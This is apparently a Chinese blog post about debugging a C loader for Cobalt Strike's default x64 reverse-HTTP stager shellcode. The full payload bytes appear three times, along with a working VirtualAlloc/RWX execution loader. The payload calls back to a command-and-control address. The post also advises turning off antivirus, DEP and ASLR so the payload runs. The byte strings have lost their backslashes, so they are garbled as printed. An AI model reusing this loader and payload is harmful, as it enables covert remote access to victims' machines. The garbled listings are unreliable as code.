研究cs的默认shellcode,有几个固定地址转跳没搞明白,上动态调试,然后两个小坑,水一水
使用cs的反dhttp监听生成c的x64 shellcode(没做免杀需要关Windows Defender)
因为没下clang,不支持内联汇编,所以用强制类型转换
简单粗暴
#include#include int main() { unsigned char buf[] = "xfcx48x83xe4xf0xe8xc8x00x00x00x41x51x41x50x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x75x72x8bx80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9x4fxffxffxffx5dx6ax00x49xbex77x69x6ex69x6ex65x74x00x41x56x49x89xe6x4cx89xf1x41xbax4cx77x26x07xffxd5x48x31xc9x48x31xd2x4dx31xc0x4dx31xc9x41x50x41x50x41xbax3ax56x79xa7xffxd5xebx73x5ax48x89xc1x41xb8x50x00x00x00x4dx31xc9x41x51x41x51x6ax03x41x51x41xbax57x89x9fxc6xffxd5xebx59x5bx48x89xc1x48x31xd2x49x89xd8x4dx31xc9x52x68x00x02x40x84x52x52x41xbaxebx55x2ex3bxffxd5x48x89xc6x48x83xc3x50x6ax0ax5fx48x89xf1x48x89xdax49xc7xc0xffxffxffxffx4dx31xc9x52x52x41xbax2dx06x18x7bxffxd5x85xc0x0fx85x9dx01x00x00x48xffxcfx0fx84x8cx01x00x00xebxd3xe9xe4x01x00x00xe8xa2xffxffxffx2fx69x58x47x55x00x93x11x94x60x5bxd9xbcx77x3axefx4dx2axc6xebxdbx75x4fx65x20xdcxe7x11x7dxa3xbfx79x29x7exafxa7x15x5dx41x8fxc6xe8x41xe8xfax63x7dx3exb7x80xc8xb8xeex0fx3fx2ex5exd3xa4xd6xf2x7dx81x27xa9x62x60x8axf2xd0x26xfcxfcx39xcexd7xb6xc1x62x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx34x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x37x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x35x2ex31x29x0dx0ax00x95x3ex4cx89xacxbexabx8axf9x97xdbxeexf4x03xb2x62xe0x68x0bxe3x86x92xa8x91x1fx9axd7xb2xdfx03x69xaex3cx45x4bxd1xf4x74x54xb2x66xfex43xe3x03x4exeex82x82xc3x77x75x3fx6axa5x5ex0fx54x13x1ax88xcaxecx4cx16xd4x23x71x88x13xafx5fx33xcex26xacx79xfbx77x53xd7xe8x1dxc7xecxe1x93x09x33x19x5ex5ex56x7ex6ex11x49x01x3dx35xdcx46xd9x2fxacx24x4bx81x34x11xaax21xcbxd8x8exd2xacxacx13x48xddxdbx7ex85xf0xf7x63x5axebx6bx80xc3x46x01x2dx40x09xd1xd1xa8x00x29xe4xfex6bx27x7dx7bxc3x67x27x9dx0dx75x05x97x17xd1x2fxeax3bxc0x4ex2exa3x94x5cxb8x79xacx34xddx0bx5fx60x48x4bx47x69xabx8fxc2xbcx67x9fx26xcbx39xddxdbxbex18x37x1fx67x6fxafx52x7ax25x9cx82xc5xf7x07x15x91xc2x61xd2xd8x7bxc0x6bxc2xd5x1exdbx8ax28x45x06x43x35x51x14x91x80x2exf1xbcxe1xa5x8dxfbx89xbbxd2x00x41xbexf0xb5xa2x56xffxd5x48x31xc9xbax00x00x40x00x41xb8x00x10x00x00x41xb9x40x00x00x00x41xbax58xa4x53xe5xffxd5x48x93x53x53x48x89xe7x48x89xf1x48x89xdax41xb8x00x20x00x00x49x89xf9x41xbax12x96x89xe2xffxd5x48x83xc4x20x85xc0x74xb6x66x8bx07x48x01xc3x85xc0x75xd7x58x58x58x48x05x00x00x00x00x50xc3xe8x9fxfdxffxffx31x39x32x2ex31x36x38x2ex31x34x2ex31x00x12x34x56x78"; ((void(*)()) &buf)(); }
直接报错异常,查看反汇编
不对劲啊,和IDApro的结果不一样,查看内存
果然有问题,开头应该是0xfc怎么变成0x30了,输出一下
#include#include int main() { unsigned char buf[] = "xfcx48x83xe4xf0xe8xc8x00x00x00x41x51x41x50x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x75x72x8bx80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9x4fxffxffxffx5dx6ax00x49xbex77x69x6ex69x6ex65x74x00x41x56x49x89xe6x4cx89xf1x41xbax4cx77x26x07xffxd5x48x31xc9x48x31xd2x4dx31xc0x4dx31xc9x41x50x41x50x41xbax3ax56x79xa7xffxd5xebx73x5ax48x89xc1x41xb8x50x00x00x00x4dx31xc9x41x51x41x51x6ax03x41x51x41xbax57x89x9fxc6xffxd5xebx59x5bx48x89xc1x48x31xd2x49x89xd8x4dx31xc9x52x68x00x02x40x84x52x52x41xbaxebx55x2ex3bxffxd5x48x89xc6x48x83xc3x50x6ax0ax5fx48x89xf1x48x89xdax49xc7xc0xffxffxffxffx4dx31xc9x52x52x41xbax2dx06x18x7bxffxd5x85xc0x0fx85x9dx01x00x00x48xffxcfx0fx84x8cx01x00x00xebxd3xe9xe4x01x00x00xe8xa2xffxffxffx2fx69x58x47x55x00x93x11x94x60x5bxd9xbcx77x3axefx4dx2axc6xebxdbx75x4fx65x20xdcxe7x11x7dxa3xbfx79x29x7exafxa7x15x5dx41x8fxc6xe8x41xe8xfax63x7dx3exb7x80xc8xb8xeex0fx3fx2ex5exd3xa4xd6xf2x7dx81x27xa9x62x60x8axf2xd0x26xfcxfcx39xcexd7xb6xc1x62x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx34x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x37x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x35x2ex31x29x0dx0ax00x95x3ex4cx89xacxbexabx8axf9x97xdbxeexf4x03xb2x62xe0x68x0bxe3x86x92xa8x91x1fx9axd7xb2xdfx03x69xaex3cx45x4bxd1xf4x74x54xb2x66xfex43xe3x03x4exeex82x82xc3x77x75x3fx6axa5x5ex0fx54x13x1ax88xcaxecx4cx16xd4x23x71x88x13xafx5fx33xcex26xacx79xfbx77x53xd7xe8x1dxc7xecxe1x93x09x33x19x5ex5ex56x7ex6ex11x49x01x3dx35xdcx46xd9x2fxacx24x4bx81x34x11xaax21xcbxd8x8exd2xacxacx13x48xddxdbx7ex85xf0xf7x63x5axebx6bx80xc3x46x01x2dx40x09xd1xd1xa8x00x29xe4xfex6bx27x7dx7bxc3x67x27x9dx0dx75x05x97x17xd1x2fxeax3bxc0x4ex2exa3x94x5cxb8x79xacx34xddx0bx5fx60x48x4bx47x69xabx8fxc2xbcx67x9fx26xcbx39xddxdbxbex18x37x1fx67x6fxafx52x7ax25x9cx82xc5xf7x07x15x91xc2x61xd2xd8x7bxc0x6bxc2xd5x1exdbx8ax28x45x06x43x35x51x14x91x80x2exf1xbcxe1xa5x8dxfbx89xbbxd2x00x41xbexf0xb5xa2x56xffxd5x48x31xc9xbax00x00x40x00x41xb8x00x10x00x00x41xb9x40x00x00x00x41xbax58xa4x53xe5xffxd5x48x93x53x53x48x89xe7x48x89xf1x48x89xdax41xb8x00x20x00x00x49x89xf9x41xbax12x96x89xe2xffxd5x48x83xc4x20x85xc0x74xb6x66x8bx07x48x01xc3x85xc0x75xd7x58x58x58x48x05x00x00x00x00x50xc3xe8x9fxfdxffxffx31x39x32x2ex31x36x38x2ex31x34x2ex31x00x12x34x56x78"; printf("%p", buf); ((void(*)()) &buf)(); }
这下正常了,直接盲猜被编译器自动优化掉了,打开项目属性果不其然 O2优化
关闭优化,调试最开始的代码,
正常,没被优化掉
继续向下执行,在要执行shellcode的一瞬间
0x0000000FE02FF790 处(位于 cshellcode.exe 中)引发的异常: 0xC0000005: 执行位置 0x0000000FE02FF790 时发生访问冲突。
根据浅薄的ACM经验判断必是指针飘了或者内存问题
但是仔细检测了就两行的代码,觉得应该没问题
突然,根据更加浅薄的PWN经验,发现可能是NX保护问题(在win下是DEP)
于是手动分配可读可写可执行的内存块试试
#include#include int main() { unsigned char buf[] = "xfcx48x83xe4xf0xe8xc8x00x00x00x41x51x41x50x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x75x72x8bx80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9x4fxffxffxffx5dx6ax00x49xbex77x69x6ex69x6ex65x74x00x41x56x49x89xe6x4cx89xf1x41xbax4cx77x26x07xffxd5x48x31xc9x48x31xd2x4dx31xc0x4dx31xc9x41x50x41x50x41xbax3ax56x79xa7xffxd5xebx73x5ax48x89xc1x41xb8x50x00x00x00x4dx31xc9x41x51x41x51x6ax03x41x51x41xbax57x89x9fxc6xffxd5xebx59x5bx48x89xc1x48x31xd2x49x89xd8x4dx31xc9x52x68x00x02x40x84x52x52x41xbaxebx55x2ex3bxffxd5x48x89xc6x48x83xc3x50x6ax0ax5fx48x89xf1x48x89xdax49xc7xc0xffxffxffxffx4dx31xc9x52x52x41xbax2dx06x18x7bxffxd5x85xc0x0fx85x9dx01x00x00x48xffxcfx0fx84x8cx01x00x00xebxd3xe9xe4x01x00x00xe8xa2xffxffxffx2fx69x58x47x55x00x93x11x94x60x5bxd9xbcx77x3axefx4dx2axc6xebxdbx75x4fx65x20xdcxe7x11x7dxa3xbfx79x29x7exafxa7x15x5dx41x8fxc6xe8x41xe8xfax63x7dx3exb7x80xc8xb8xeex0fx3fx2ex5exd3xa4xd6xf2x7dx81x27xa9x62x60x8axf2xd0x26xfcxfcx39xcexd7xb6xc1x62x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx34x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x37x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x35x2ex31x29x0dx0ax00x95x3ex4cx89xacxbexabx8axf9x97xdbxeexf4x03xb2x62xe0x68x0bxe3x86x92xa8x91x1fx9axd7xb2xdfx03x69xaex3cx45x4bxd1xf4x74x54xb2x66xfex43xe3x03x4exeex82x82xc3x77x75x3fx6axa5x5ex0fx54x13x1ax88xcaxecx4cx16xd4x23x71x88x13xafx5fx33xcex26xacx79xfbx77x53xd7xe8x1dxc7xecxe1x93x09x33x19x5ex5ex56x7ex6ex11x49x01x3dx35xdcx46xd9x2fxacx24x4bx81x34x11xaax21xcbxd8x8exd2xacxacx13x48xddxdbx7ex85xf0xf7x63x5axebx6bx80xc3x46x01x2dx40x09xd1xd1xa8x00x29xe4xfex6bx27x7dx7bxc3x67x27x9dx0dx75x05x97x17xd1x2fxeax3bxc0x4ex2exa3x94x5cxb8x79xacx34xddx0bx5fx60x48x4bx47x69xabx8fxc2xbcx67x9fx26xcbx39xddxdbxbex18x37x1fx67x6fxafx52x7ax25x9cx82xc5xf7x07x15x91xc2x61xd2xd8x7bxc0x6bxc2xd5x1exdbx8ax28x45x06x43x35x51x14x91x80x2exf1xbcxe1xa5x8dxfbx89xbbxd2x00x41xbexf0xb5xa2x56xffxd5x48x31xc9xbax00x00x40x00x41xb8x00x10x00x00x41xb9x40x00x00x00x41xbax58xa4x53xe5xffxd5x48x93x53x53x48x89xe7x48x89xf1x48x89xdax41xb8x00x20x00x00x49x89xf9x41xbax12x96x89xe2xffxd5x48x83xc4x20x85xc0x74xb6x66x8bx07x48x01xc3x85xc0x75xd7x58x58x58x48x05x00x00x00x00x50xc3xe8x9fxfdxffxffx31x39x32x2ex31x36x38x2ex31x34x2ex31x00x12x34x56x78"; //printf("%p", buf); //((void(*)()) &buf)(); void* p = NULL; p = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(p, buf, sizeof(buf)); ((void(*)()) p)(); }
解决报错,去查看vs的选项中也发现DEP默认开启
为了以防万一顺便把地址随机化保护ASLR也关了
但意外的是关闭后如果调试最开始的代码依旧报错,可能和win10系统对64位程序自带DEP有关,所以还是使用分配内存的方法吧
关杀软,关优化,关保护
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)